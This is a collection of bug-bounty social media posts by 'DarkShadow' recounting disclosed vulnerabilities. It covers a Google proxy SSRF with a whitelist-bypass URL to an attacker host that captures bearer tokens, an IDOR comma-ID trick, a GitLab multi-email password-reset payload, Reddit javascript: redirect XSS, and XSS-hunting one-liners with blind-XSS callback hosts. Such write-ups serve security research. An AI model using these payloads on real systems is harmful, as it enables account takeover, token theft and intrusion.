Hey Hunters,

DarkShadow here—back again with a very interesting Google SSRF Proof of Concept!


🧠 Fixing the Unfixable: A Google Cloud SSRF Tale

A critical Server-Side Request Forgery (SSRF) vulnerability was discovered in Google's cxl-services.appspot.com proxy, which powers interactive demos for various Google Cloud products, including jobs.googleapis.com.


🔍 Discovery

While exploring the Cloud Talent Solution API (jobs.googleapis.com), it was noticed that demo requests were routed through:

cxl-services.appspot.com/proxy?url=

Here’s a sample request:

GET /proxy?url=https://jobs.googleapis.com/v4/projects/4808913407/tenants/ff8c4578-8000-0000-0000-00011ea231ff/jobs:search HTTP/1.1
Host: cxl-services.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Content-Type: application/json; charset=utf-8
Content-Length: 102
Connection: close

{"jobQuery":{"query":"bartendar","queryLanguageCode":"en"},"jobView":"JOB_VIEW_SMALL","maxPageSize":5}

The response returned 200 OK and displayed the full content, meaning the SSRF was not blind — and that makes it critical.


🧱 Initial Test: Traditional SSRF Blocked

Trying to change the url parameter to a malicious domain:

GET /proxy?url=https://attacker_server.com HTTP/1.1
Host: cxl-services.appspot.com

Response:

403 Forbidden
Invalid Target Host - Please add to allow list

This indicated the presence of a backend whitelist restricting outbound requests.


🛡️ Whitelist Bypass Trick

Despite the whitelist, a clever bypass was possible by exploiting discrepancies between URL parsers (RFC3986 vs. WHATWG) using a backslash (\) and @ symbol:

GET /proxy?url=https://attacker.com\@jobs.googleapis.com/ HTTP/1.1
Host: cxl-services.appspot.com

This tricked the proxy into making the request to attacker.com, while treating the domain as jobs.googleapis.com.


🔓 Sensitive Token Leakage

Even worse: the proxy included an Authorization: Bearer <token> header in its outbound requests.

By redirecting traffic to a controlled server, the researcher was able to capture tokens granting access to internal Google Cloud projects such as:

docai-demo
cxl-services
garage-staging
p-jobs

He even deployed a custom App Engine service within cxl-services, proving full code execution capabilities.


💰 Bounty Rewards

For these critical findings, the researcher earned over $13,000 from Google’s Vulnerability Reward Program (VRP).

Credit: Discovered by David Schütz
But Hunters, don’t forget to follow me for more deep-dive writeups and live exploitation breakdowns!

Follow me in X 👉🏼 DarkShadow

#bugbountytips #googlebug #ssrf

💡 IDOR Bypass Bug Bounty Tip

Sometimes APIs behave unexpectedly when multiple IDs are passed together.

🔍 Scenario
• Victim’s ID: 5200
• Attacker’s ID: 5233

🚫 GET /api/users/5200/info → Access Denied
✅ GET /api/users/5200,5233/info → Bypass Successful

📌 Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!

#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips

Hey Hunters,
DarkShadow is back again with another POC that earned $35,000 🙌🏼

💥 GitLab Password Reset via Account Takeover Vulnerability 😬

This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email 🤯

✅ POC Request:

"user": {
    "email": [
        "[email protected]",
        "[email protected]"
    ]
}

I was shared this same method a long time ago 😁
Don't forget to follow me 👉🏼 DarkShadow

Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commands😉

Cleaned XSS Payload Hunting Commands:


1. Wayback + httpx + GF + Dalfox

cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done

2. Gospider + Dalfox

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe

3. Wayback + GF + Blind XSS via Dalfox

waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe

4. Gospider + Dalfox (Deep Crawl)

gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt

5. Dalfox Direct with Blind XSS

cat urls.txt | dalfox pipe -b yourdomain.xss

Required tools are:

httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox

If you find this helpful and want more cutting-edge tips and tricks, don’t forget to follow me 👉🏼 DarkShadow

#bugbountytips #xss

Good morning hacker's,
Let's start morning to hack Reddit account 😉

Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!

Let’s break it down and understand the logic behind the vulnerability.


Vulnerable Parameter: ?dest=

What does the dest parameter do?

The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:

A user tries to access a protected page.

Reddit redirects them to:
/login/?dest=/protected/resource

After login, the site redirects them to the original dest URL.

Sounds fine, right? But here’s the twist...

✅ PoC Steps (Super Simple):

https://www.reddit.com/login/?dest=javascript:alert(document.domain)

Boom💥. That’s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation — just a mindset shift.

keep your payloads sharp and your eyes sharper.
Don’t forget to react, share, and follow me in X
👉🏼 DarkShadow

#bugbountytips #xss